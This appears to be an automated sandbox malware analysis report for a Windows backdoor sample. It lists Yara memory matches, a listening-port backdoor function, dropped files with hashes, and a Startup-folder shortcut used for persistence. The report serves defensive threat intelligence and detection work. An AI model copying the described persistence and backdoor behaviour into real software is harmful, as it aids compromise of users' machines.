Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_004C2263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		11_2_004C1C61

Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1417469
Product:	CloudBasic
Start time:	11:37:17
Start date:	29.03.2024
Sample:	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	63b3dd980ac9a06fd167b0df8121c979
SHA1:	eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256:	44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\EcoVision Dynamics\A	ASCII text, with very long lines (943), with CRLF line terminators	A8384A3F77CF55416BF3C996DEB5E11C	FB77D6B37D48394B75C0B2E18345E6358BC500C6	DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js	ASCII text, with no line terminators	CA880452D2622FBE238A01ACB8D73CCB	B3F5C3898EEE72AF66260BE8924AC2E988FB7C26	91E00907B1415FEB75080793106234C3B08C4863B6F39DD9773417BF11B619B5
C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	PE32 executable (GUI) Intel 80386, for MS Windows	62D09F076E6E0240548C2F837536A46A	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\R	ASCII text, with very long lines (943), with CRLF line terminators	A8384A3F77CF55416BF3C996DEB5E11C	FB77D6B37D48394B75C0B2E18345E6358BC500C6	DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	0D5DF43AF2916F47D00C1573797C1A13	230AB5559E806574D26B4C20847C368ED55483B0	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	PE32 executable (GUI) Intel 80386, for MS Windows	62D09F076E6E0240548C2F837536A46A	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cameras	data	D766F32452AB37F9D3F7442B79D3C7AA	A64451C419B835C894C4CCBAEC1F3B677FFB2865	D746AAB00DA0D7A6642B750B8E74ECBB6E06A697A86C12C2E53D5402B2CB4F76
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander	data	D42D5B6C62FC16537F9E02F6878A726B	558D6606042464216A725CDD4FFA5FBEE3F89754	6DA998806AF8D45879B783B961B647DF7FE5B37CC182EFF6756DA0CA6079C4AB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting	ASCII text, with very long lines (1047), with CRLF line terminators	374D1802B678505470AF77CC3FC02DFC	44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D	41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting.bat (copy)	ASCII text, with very long lines (1047), with CRLF line terminators	374D1802B678505470AF77CC3FC02DFC	44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D	41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fears	data	49141FA1580FF171C93AAD4EB541DDAB	E7D96F4358600E4AFC85460733DF06C7598C81B4	A6F110CAEB2C931BAD058BCA3780DD4BCD4144AB16DEA37553A859CAA528B63E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Friends	data	0CEC2E416A4658BB57E658D166BA8A96	C746A3070DE12EF164E8622C74D0A0857AB7CF4E	92A2B4A8A9044997C5C3A11A1FDAF1A446ABA5248BF02D125D9BA8C1F3F06C4C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Keyboard	ASCII text, with very long lines (1261), with CRLF line terminators	B7F27A133E90AE9A58E2559C9CAF9759	39B6E7DE5C6DC0252F9A05B308BF079E21E4872D	3E0D772FAA0819C04B8E5C97B4FD02A78015B3B1D69AF0159F875E37F60BBB00
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	PE32 executable (GUI) Intel 80386, for MS Windows	0FE23AAA844275CC69153C1C530F056A	6E7FD65663CFA44BA68C8367A1C415E999CB8371	19942D356EC90F076D6EDA272030D4C341877FD7DF58FB7FF4C804BDDBF01D99
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Papers	data	1F22516DB88C817A0A2690AE44D0D5A1	941957208145B05374152EEBCEB4B1E27AC567B6	D8B1CE1A6DD67094E5A6B1C2B48115D561E7E012079BE031B48F1791A2ACBE12
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Plugins	data	3CBF1D6D00412611D1C10072A5608AE7	368A8A3592CC335ABA9E99E8C4BB716F5228DF49	181C602909F69F5524318810AD257EEB3F8831E34F826E5DABF3A797DA1FFFED
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Stream	ASCII text, with very long lines (943), with CRLF line terminators	545E573943B2D77F96AAF83A4C90468D	CA20A8FF17C84969B352ADFB2911C9C365C731DC	66DBD0BD2AC4AE854AC15B01EF61265093DA7E4534DD630A5955D8879B155BC7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tramadol	data	CB0CF96099E0CD964CCC2003CE264D93	2D15DB969842A6B196336FB1BAF6CA38BE482A59	520481555DD6940947DD602F3DB5A162BA0F7D8CB201C01EB4124FDF70645D88
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >), ASCII text, with CRLF line terminators	D96773F48A1A7C708BB89865AE2C9B0D	F6615DDB6E67985D43EF286BA5339B6C2A45888E	DAA97D2D532DA00B2614F33A0D9A08AC8417146A493ADCEEF4F7F40C1C26F695
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log	Unicode text, UTF-16, little-endian text, with CRLF line terminators	5C8971C03F58B451BCDB44CB4896E96D	FF97CBF2DC1A939E23CE0336511D79AFD6966B8E	1AC32F9C7681FE6112B36409250508735CA8904797D86B906545256AD2FFEDB7

Windows Analysis Report SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Malware Threat Intel
Provided by